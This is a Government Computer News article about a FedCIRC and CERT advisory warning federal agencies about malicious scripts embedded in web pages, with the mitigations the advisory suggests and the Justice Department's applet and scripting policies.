Security experts warn of potential Web site dangers

Security experts warn of potential Web site dangers

By Christopher J. Dorobek

GCN Staff

FEB. 4'The Federal Computer Incident Response Capability team is telling agencies to be wary of malicious code surreptitiously embedded in scripting language that could activate when a user visits a Web site, or downloads or provides data online.

An advisory said hackers could use such code to gain access to data on a Web server or to information provided by visitors to a site. FedCIRC said agencies should give the alert a high priority because of the government's increased reliance on the Web as a communications medium.

"Users may unintentionally execute scripts written by an attacker when they follow untrusted links in Web pages, mail messages or newsgroups," the advisory said. "Because the malicious scripts are executed in a context that appears to have originated from the targeted site, the attacker has full access to the document retrieved."

The hole could make it possible for the attacker to get the information even if the user is using Secure Sockets Layer, the most widely used encryption method for protecting information submitted online, the alert said.

The General Services Administration's FedCIRC, the Defense Department's Computer Emergency Response Team, DOD's Joint Task Force for Computer Network Defense, the FBI's National Infrastructure Protection Center and Carnegie Mellon University's Computer Emergency Response Team Coordination Center released the alert. It is posted at

There are no easy fixes, FedCIRC said. "None of the solutions that Web users can take are complete," it said. "In the end, it is up to the Web page developers to modify their pages to eliminate these types of problems."

There are some measures that Web users can take, such as setting their browsers to disable scripting languages. The warning acknowledged that disabling scripts would result in reduced functionality on some sites. "Users should select this option when they require the lowest possible level of risk," the advisory said.

Another option is for users to be selective in their initial site visits. This will "significantly reduce a user's exposure while still maintaining functionality," the advisory said. "Users should understand that they are accepting more risk when they select this option, but they are doing so in order to preserve functionality that is important to them."

Some agencies already have tough applet and scripting polices.

The Justice Department, for instance, last year banned the use of applets because of concerns about potential vulnerabilities [see GCN story at]. The department lifted the ban four months later but set specific rules for the use of scripting languages, saying it wanted to balance the need to manage systems risks against the need of Justice employees to use the Web [see story at].

Stay Connected

Sign up for our newsletter.

I agree to this site's Privacy Policy.